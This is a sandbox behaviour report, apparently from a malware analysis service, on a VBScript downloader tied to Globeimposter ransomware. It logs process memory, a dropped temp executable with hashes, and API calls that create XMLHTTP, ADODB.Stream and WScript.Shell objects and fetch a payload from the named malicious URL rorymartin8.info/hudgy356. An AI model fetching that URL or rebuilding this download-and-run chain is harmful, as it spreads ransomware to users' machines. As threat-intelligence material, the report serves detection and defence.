Globeimposter Ransomware Delivered via Necurs Botnet

Monitored Processes

Behavior Information - Sequential View

Process #1: cscript.exe

(Host: 90, Network: 6)

Information	Value
ID	#1
File Name	c:\windows\system32\cscript.exe
Command Line	"C:\Windows\System32\CScript.exe" "C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:13, Reason: Analysis Target
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:05:10

OS Process Information

Information	Value
PID	0xe98
Parent PID	0x728 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x E9C 0x ED4 0x EE4 0x EE8 0x EEC 0x EF0 0x EF4 0x EF8 0x F24 0x F88

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000c468480000	0xc468480000	0xc46849ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c468480000	0xc468480000	0xc46848ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x000000c468490000	0xc468490000	0xc468496fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c4684a0000	0xc4684a0000	0xc4684b3fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c4684c0000	0xc4684c0000	0xc4685bffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c4685c0000	0xc4685c0000	0xc4685c3fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c4685d0000	0xc4685d0000	0xc4685d0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c4685e0000	0xc4685e0000	0xc4685e1fff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0xc4685f0000	0xc4686adfff	Memory Mapped File	Readable	Region Actions
private_0x000000c4686b0000	0xc4686b0000	0xc4687affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c4687b0000	0xc4687b0000	0xc4687b6fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c4687c0000	0xc4687c0000	0xc4688bffff	Private Memory	Readable, Writable	Region Actions Download Dump
cscript.exe.mui	0xc4688c0000	0xc4688c2fff	Memory Mapped File	Readable	Region Actions
private_0x000000c4688d0000	0xc4688d0000	0xc4688d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c4688e0000	0xc4688e0000	0xc4688e0fff	Private Memory	Readable, Writable	Region Actions Download Dump
rpcss.dll	0xc4688f0000	0xc4689c5fff	Memory Mapped File	Readable	Region Actions
private_0x000000c4688f0000	0xc4688f0000	0xc46895ffff	Private Memory	Readable, Writable	Region Actions Download Dump
cscript.exe	0xc4688f0000	0xc4688f8fff	Memory Mapped File	Readable	Region Actions
pagefile_0x000000c468900000	0xc468900000	0xc468900fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468900000	0xc468900000	0xc468903fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468910000	0xc468910000	0xc468910fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468920000	0xc468920000	0xc468920fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468930000	0xc468930000	0xc468931fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c468930000	0xc468930000	0xc46893ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c468940000	0xc468940000	0xc468941fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c468940000	0xc468940000	0xc468946fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c468950000	0xc468950000	0xc46895ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c468960000	0xc468960000	0xc4689effff	Private Memory	Readable, Writable	Region Actions Download Dump
msmplics.dll	0xc468960000	0xc468961fff	Memory Mapped File	Readable	Region Actions
private_0x000000c468960000	0xc468960000	0xc4689cffff	Private Memory	Readable, Writable	Region Actions Download Dump
msxml3r.dll	0xc468960000	0xc468960fff	Memory Mapped File	Readable	Region Actions
scrrun.dll	0xc468970000	0xc46897ffff	Memory Mapped File	Readable	Region Actions
pagefile_0x000000c468970000	0xc468970000	0xc468970fff	Pagefile Backed Memory	Readable, Writable	Region Actions
counters.dat	0xc468980000	0xc468980fff	Memory Mapped File	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c468990000	0xc468990000	0xc468990fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x000000c4689a0000	0xc4689a0000	0xc4689affff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c4689b0000	0xc4689b0000	0xc4689b1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c4689c0000	0xc4689c0000	0xc4689cffff	Private Memory	Readable, Writable	Region Actions Download Dump
mswsock.dll.mui	0xc4689d0000	0xc4689d2fff	Memory Mapped File	Readable	Region Actions
private_0x000000c4689e0000	0xc4689e0000	0xc4689effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c4689f0000	0xc4689f0000	0xc4689fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c468a00000	0xc468a00000	0xc468b87fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468b90000	0xc468b90000	0xc468d10fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000c468d20000	0xc468d20000	0xc46a11ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0xc46a120000	0xc46a456fff	Memory Mapped File	Readable	Region Actions
private_0x000000c46a460000	0xc46a460000	0xc46a55ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c46a560000	0xc46a560000	0xc46a617fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c46a620000	0xc46a620000	0xc46a71ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x000000c46a720000	0xc46a720000	0xc46b71ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x000000c46a720000	0xc46a720000	0xc46a81ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46a820000	0xc46a820000	0xc46a91ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46a920000	0xc46a920000	0xc46aa9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46a920000	0xc46a920000	0xc46aa5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46a920000	0xc46a920000	0xc46aa4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
kernelbase.dll.mui	0xc46a920000	0xc46a9fefff	Memory Mapped File	Readable	Region Actions
pagefile_0x000000c46aa00000	0xc46aa00000	0xc46aa01fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000c46aa40000	0xc46aa40000	0xc46aa4ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46aa50000	0xc46aa50000	0xc46aa5ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46aa90000	0xc46aa90000	0xc46aa9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46aaa0000	0xc46aaa0000	0xc46ac6ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46aaa0000	0xc46aaa0000	0xc46ab9ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46ac60000	0xc46ac60000	0xc46ac6ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46ac70000	0xc46ac70000	0xc46b06ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b070000	0xc46b070000	0xc46b16ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b170000	0xc46b170000	0xc46b26ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b270000	0xc46b270000	0xc46b36ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b370000	0xc46b370000	0xc46b46ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b470000	0xc46b470000	0xc46b56ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000c46b570000	0xc46b570000	0xc46b66ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00007df5ff070000	0x7df5ff070000	0x7ff5ff06ffff	Pagefile Backed Memory	-	Region Actions
private_0x00007ff76fe06000	0x7ff76fe06000	0x7ff76fe07fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76fe08000	0x7ff76fe08000	0x7ff76fe09fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76fe0a000	0x7ff76fe0a000	0x7ff76fe0bfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76fe0c000	0x7ff76fe0c000	0x7ff76fe0dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76fe0e000	0x7ff76fe0e000	0x7ff76fe0ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00007ff76fe10000	0x7ff76fe10000	0x7ff76ff0ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00007ff76ff10000	0x7ff76ff10000	0x7ff76ff32fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00007ff76ff34000	0x7ff76ff34000	0x7ff76ff35fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76ff36000	0x7ff76ff36000	0x7ff76ff37fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76ff38000	0x7ff76ff38000	0x7ff76ff39fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76ff3a000	0x7ff76ff3a000	0x7ff76ff3afff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76ff3c000	0x7ff76ff3c000	0x7ff76ff3dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00007ff76ff3e000	0x7ff76ff3e000	0x7ff76ff3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
cscript.exe	0x7ff770f20000	0x7ff770f4efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msado15.dll	0x7ffb23920000	0x7ffb23a56fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml3.dll	0x7ffb23a60000	0x7ffb23c96fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpclient.dll	0x7ffb23ca0000	0x7ffb23d79fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
scrrun.dll	0x7ffb24e20000	0x7ffb24e54fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
scrobj.dll	0x7ffb24fa0000	0x7ffb24fe3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7ffb24ff0000	0x7ffb25099fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vbscript.dll	0x7ffb250a0000	0x7ffb25131fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshom.ocx	0x7ffb253b0000	0x7ffb253d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msdart.dll	0x7ffb25f00000	0x7ffb25f24fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mlang.dll	0x7ffb26110000	0x7ffb2614cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldp.dll	0x7ffb2bea0000	0x7ffb2beaffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x7ffb2e5a0000	0x7ffb2e846fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x7ffb2ea50000	0x7ffb2ebe6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ondemandconnroutehelper.dll	0x7ffb2ec80000	0x7ffb2ec94fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshext.dll	0x7ffb2ef00000	0x7ffb2ef1cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x7ffb308c0000	0x7ffb308c9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msisip.dll	0x7ffb30d00000	0x7ffb30d0bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpoav.dll	0x7ffb30d60000	0x7ffb30d7cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
amsi.dll	0x7ffb30da0000	0x7ffb30daffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7ffb318d0000	0x7ffb318d9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x7ffb31aa0000	0x7ffb31e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x7ffb333f0000	0x7ffb334c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7ffb34cc0000	0x7ffb34f33fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
fwpuclnt.dll	0x7ffb361e0000	0x7ffb36247fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x7ffb373f0000	0x7ffb373fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x7ffb37410000	0x7ffb37447fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x7ffb37f40000	0x7ffb37f61fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7ffb38610000	0x7ffb386a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gpapi.dll	0x7ffb38c60000	0x7ffb38c82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mpr.dll	0x7ffb38f70000	0x7ffb38f8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7ffb39260000	0x7ffb39292fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x7ffb39350000	0x7ffb3936efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x7ffb393b0000	0x7ffb39457fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x7ffb395b0000	0x7ffb3960cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x7ffb39610000	0x7ffb39626fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x7ffb39780000	0x7ffb3978afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x7ffb39960000	0x7ffb3998bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcrypt.dll	0x7ffb39b60000	0x7ffb39b87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
bcryptprimitives.dll	0x7ffb39b90000	0x7ffb39bfafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sxs.dll	0x7ffb39c00000	0x7ffb39c97fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x7ffb39d40000	0x7ffb39d50fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel.appcore.dll	0x7ffb39d60000	0x7ffb39d6efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x7ffb39d70000	0x7ffb39d82fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
powrprof.dll	0x7ffb39d90000	0x7ffb39dd9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windows.storage.dll	0x7ffb39de0000	0x7ffb3a407fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wintrust.dll	0x7ffb3a460000	0x7ffb3a4b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shcore.dll	0x7ffb3a570000	0x7ffb3a622fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x7ffb3a630000	0x7ffb3a7f0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x7ffb3a800000	0x7ffb3a9dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x7ffb3a9e0000	0x7ffb3a9e7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x7ffb3a9f0000	0x7ffb3aa40fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x7ffb3aa50000	0x7ffb3bf74fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x7ffb3bf80000	0x7ffb3c0a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x7ffb3c290000	0x7ffb3c2c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x7ffb3c2d0000	0x7ffb3c375fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x7ffb3c3e0000	0x7ffb3c564fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x7ffb3c570000	0x7ffb3c5d8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
coml2.dll	0x7ffb3c5e0000	0x7ffb3c64efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x7ffb3c650000	0x7ffb3c79dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x7ffb3c950000	0x7ffb3c9aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x7ffb3c9b0000	0x7ffb3ca6dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x7ffb3ca70000	0x7ffb3cb14fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x7ffb3cb20000	0x7ffb3cc60fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
combase.dll	0x7ffb3cc70000	0x7ffb3ceebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x7ffb3cf10000	0x7ffb3cfacfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x7ffb3d020000	0x7ffb3d17bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x7ffb3d260000	0x7ffb3d30cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x7ffb3d310000	0x7ffb3d4d1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 11 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe	155.80 KB (159535 bytes)	MD5: 5da21af74810e3655bcbbe40660f21b8 SHA1: 60d60dff0d3af3b564e43bc87ef5a63ff6146da7 SHA256: c0ce6c2f03e3174d347eb2136a230883a725fcd5179221f61435ea709a2ba81f		File Actions Show Properties Download

Threads

Thread 0xe9c

(Host: 89, Network: 6)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff770f20000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x7ffb3d260000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ffb3d27d550	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x7ffb3d260000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7ffb3d280f40	1	Fn
Module	Get Filename	module_name = c:\windows\system32\cscript.exe, process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 110	1	Fn Data
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.VBS	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.VBS, data = VBSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\VBSFile\ScriptEngine, data = VBScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460	1	Fn
Module	Load	module_name = amsi.dll, base_address = 0x7ffb30da0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30da2260	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffb30da26b0	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 96078	1	Fn
File	Create	filename = C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS, filename = C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS, protection = PAGE_READONLY, maximum_size = 4818	1	Fn
Module	Map	C:\Users\CIIHMN~1\Desktop\MSC000~1.VBS, process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\cscript.exe	1	Fn
Module	Load	module_name = WLDP.DLL, base_address = 0x7ffb2bea0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wldp.dll, function = WldpGetLockdownPolicy, address_out = 0x7ffb2bea1010	1	Fn
Module	Get Address	module_name = c:\windows\system32\wldp.dll, function = WldpIsClassInApprovedList, address_out = 0x7ffb2bea3820	1	Fn
System	Get Info	type = System Directory	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7ffb3c2d0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7ffb3c2da7d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7ffb3c2d3ba0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7ffb3c2e6cc0	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	type = size	1	Fn
File	Read	size = 4818, size_out = 4818	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
COM	Get Class ID	cls_id = ED8C108E-4349-11D2-91A4-00C04F7969E8, prog_id = Microsoft.XMLHTTP	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Get Class ID	cls_id = 00000566-0000-0010-8000-00AA006D2EA4, prog_id = Adodb.streaM	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = Wscript.shell	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cscript.exe, base_address = 0x7ff770f20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\cscript.exe, function = 1, address_out = 0x7ff770f21350	1	Fn
COM	Get Class ID	cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Inet	Open Connection	protocol = http, server_name = rorymartin8.info, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = GeT, http_version = HTTP 1.1, target_resource = /hudgy356	1	Fn
Inet	Send HTTP Request	url = http://rorymartin8.info/hudgy356?	1	Fn
Inet	Receive HTTP Status	status = 200	1	Fn
COM	Get Class ID	cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell	1	Fn
